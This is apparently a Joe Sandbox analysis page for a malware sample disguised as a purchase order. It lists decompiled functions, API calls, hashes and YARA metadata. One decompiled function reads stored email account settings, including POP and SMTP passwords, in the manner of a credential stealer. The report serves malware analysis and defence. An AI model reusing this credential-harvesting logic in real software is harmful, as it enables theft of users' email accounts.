                      • Snapshot File: hcaresult_1_2_400000_Purchase Order #5000012803.jbxd
                      Yara matches
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 042642b6324743061f7cb6dcc4248db4a99ff7c1e794a59b5538058313c095a3
                      • Instruction ID: d5512459148ba4630ff55d530b0b04b7b8071b1588054f6e556ec5c474e97d6d
                      • Opcode Fuzzy Hash: 042642b6324743061f7cb6dcc4248db4a99ff7c1e794a59b5538058313c095a3
                      • Instruction Fuzzy Hash: 82C04C3118520876EA112AD19C07F597E1D9B45B68F108425BA1C6C4D19AB3A6505559
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Function 00405924, Relevance: 1.3, APIs: 1, Instructions: 12COMMON
                      Download Yara Rule
                      C-Code - Quality: 100%
                      			E00405924(WCHAR* _a4, WCHAR* _a8) {
				WCHAR* _t4;
				void* _t5;

				E004031E5(_t5, 2, 0xd6865bd4, 0, 0);
				_t4 = StrStrW(_a4, _a8); // executed
				return _t4;
			}





                      0x00405932
                      0x0040593d
                      0x00405940

                      APIs
                      • StrStrW.KERNELBASE(?,?,00000002,D6865BD4,00000000,00000000), ref: 0040593D
                      Memory Dump Source
                      • Source File: 00000001.00000002.923644553.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000001.00000002.923659857.00000000004A0000.00000040.00000001.sdmp Download File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_1_2_400000_Purchase Order #5000012803.jbxd
                      Yara matches
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 4bee70add85649cbd4a2768cfe9b9dcd091b7df8922090f97a094487be0f2036
                      • Instruction ID: 5151f40d070928696ad3a3dfeafe9e6e8178c5ee17630b0dfe73cc98556a196c
                      • Opcode Fuzzy Hash: 4bee70add85649cbd4a2768cfe9b9dcd091b7df8922090f97a094487be0f2036
                      • Instruction Fuzzy Hash: 8FC04C311842087AEA112FD2DC07F587E1D9B45B58F104015B61C2C5D1DAB3A6105659
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Non-executed Functions

                      Function 0040D069, Relevance: 12.6, Strings: 10, Instructions: 138COMMON
                      Download Yara Rule
                      C-Code - Quality: 88%
                      			E0040D069(void* __ebx, void* __eflags, intOrPtr* _a4) {
				signed int _v8;
				signed int _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				intOrPtr _v40;
				intOrPtr _v44;
				void* __edi;
				void* __esi;
				intOrPtr _t40;
				intOrPtr _t45;
				intOrPtr _t47;
				void* _t71;
				void* _t75;
				void* _t77;

				_t72 = _a4;
				_t71 = E00404BEE(__ebx,  *_a4, L"EmailAddress");
				_t81 = _t71;
				if(_t71 != 0) {
					_push(__ebx);
					_t67 = E00404BEE(__ebx,  *_t72, L"Technology");
					_v16 = E00404BEE(_t37,  *_t72, L"PopServer");
					_v40 = E00404BA7(_t81,  *_t72, L"PopPort");
					_t40 = E00404BEE(_t37,  *_t72, L"PopAccount");
					_v8 = _v8 & 0x00000000;
					_v20 = _t40;
					_v24 = E00404C4E(_t71,  *_t72, L"PopPassword",  &_v8);
					_v28 = E00404BEE(_t67,  *_t72, L"SmtpServer");
					_v44 = E00404BA7(_t81,  *_t72, L"SmtpPort");
					_t45 = E00404BEE(_t67,  *_t72, L"SmtpAccount");
					_v12 = _v12 & 0x00000000;
					_v32 = _t45;
					_t47 = E00404C4E(_t71,  *_t72, L"SmtpPassword",  &_v12);
					_t77 = _t75 + 0x50;
					_v36 = _t47;
					if(_v8 != 0 || _v12 != 0) {
						E00405872( *0x49f934, _t71, 1, 0);
						E00405872( *0x49f934, _t67, 1, 0);
						_t74 = _v16;
						E00405872( *0x49f934, _v16, 1, 0);
						E00405781( *0x49f934, _v40);
						E00405872( *0x49f934, _v20, 1, 0);
						_push(_v8);
						E00405762(_v16,  *0x49f934, _v24);
						E00405872( *0x49f934, _v28, 1, 0);
						E00405781( *0x49f934, _v44);
						E00405872( *0x49f934, _v32, 1, 0);
						_push(_v12);
						E00405762(_t74,  *0x49f934, _v36);
						_t77 = _t77 + 0x88;
					} else {
						_t74 = _v16;
					}
					E0040471C(_t71);
					E0040471C(_t67);
					E0040471C(_t74);
					E0040471C(_v20);
					E0040471C(_v24);
					E0040471C(_v28);
					E0040471C(_v32);
					E0040471C(_v36);
				}
				return 1;
			}





















                      0x0040d070
                      0x0040d080
                      0x0040d084
                      0x0040d086
                      0x0040d08c
                      0x0040d0a0
                      0x0040d0ae
                      0x0040d0bd
                      0x0040d0c0
                      0x0040d0c5
                      0x0040d0c9
                      0x0040d0e3
                      0x0040d0f2
                      0x0040d101
                      0x0040d104
                      0x0040d109
                      0x0040d110
                      0x0040d11e
                      0x0040d123
                      0x0040d126
                      0x0040d12d
                      0x0040d145
                      0x0040d154
                      0x0040d15a
                      0x0040d166
                      0x0040d174
                      0x0040d186
                      0x0040d18e
                      0x0040d19a
                      0x0040d1ac
                      0x0040d1ba
                      0x0040d1cc
                      0x0040d1d1
                      0x0040d1dd
                      0x0040d1e2
                      0x0040d1e7
                      0x0040d1e7
                      0x0040d1e7
                      0x0040d1eb
                      0x0040d1f1
                      0x0040d1f7
                      0x0040d1ff
                      0x0040d207
                      0x0040d20f
                      0x0040d217
                      0x0040d21f
                      0x0040d227
                      0x0040d230

                      Strings
                      Memory Dump Source
                      • Source File: 00000001.00000002.923644553.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000001.00000002.923659857.00000000004A0000.00000040.00000001.sdmp Download File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_1_2_400000_Purchase Order #5000012803.jbxd
                      Yara matches
                      Similarity
                      • API ID:
                      • String ID: EmailAddress$PopAccount$PopPassword$PopPort$PopServer$SmtpAccount$SmtpPassword$SmtpPort$SmtpServer$Technology
                      • API String ID: 0-2111798378
                      • Opcode ID: 4f23c8655d16a9709c8d74bd686147b8dbb65e0931b573aa619d5bf1b9c89d18
                      • Instruction ID: 091e628055053f5eef329adcdd4db079f25726ad560f051e033024c376855220
                      • Opcode Fuzzy Hash: 4f23c8655d16a9709c8d74bd686147b8dbb65e0931b573aa619d5bf1b9c89d18
                      • Instruction Fuzzy Hash: AE414EB5941218BADF127BE6DD42F9E7F76EF94304F21003AF600721B2C77A99609B48
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Function 0040434D, Relevance: 15.1, APIs: 10, Instructions: 135memorycomCOMMON
                      Download Yara Rule
                      APIs
                      • CoInitialize.OLE32(00000000), ref: 0040438F
                      • CoCreateInstance.OLE32(00418EC0,00000000,00000001,00418EB0,?), ref: 004043A9
                      • VariantInit.OLEAUT32(?), ref: 004043C4
                      • SysAllocString.OLEAUT32(?), ref: 004043CD
                      • VariantInit.OLEAUT32(?), ref: 00404414
                      • SysAllocString.OLEAUT32(?), ref: 00404419
                      • VariantInit.OLEAUT32(?), ref: 00404431
                      Memory Dump Source
                      • Source File: 00000001.00000002.923644553.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000001.00000002.923659857.00000000004A0000.00000040.00000001.sdmp Download File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_1_2_400000_Purchase Order #5000012803.jbxd
                      Yara matches
                      Similarity
                      • API ID: InitVariant$AllocString$CreateInitializeInstance
                      • String ID:
                      • API String ID: 1312198159-0
                      • Opcode ID: 36af1e644ba25a92da10ffd92c092694d7a96ee7919212810e1bb10a92bc3d30
                      • Instruction ID: 6cc2ba4480fbb4d68866773ab5e076051400aafb7d2546f6199fc19a864342a4
                      • Opcode Fuzzy Hash: 36af1e644ba25a92da10ffd92c092694d7a96ee7919212810e1bb10a92bc3d30
                      • Instruction Fuzzy Hash: 9A414C71A00609EFDB00EFE4DC84ADEBF79FF89314F10406AFA05AB190DB759A458B94
                      Uniqueness

                      Uniqueness Score: -1.00%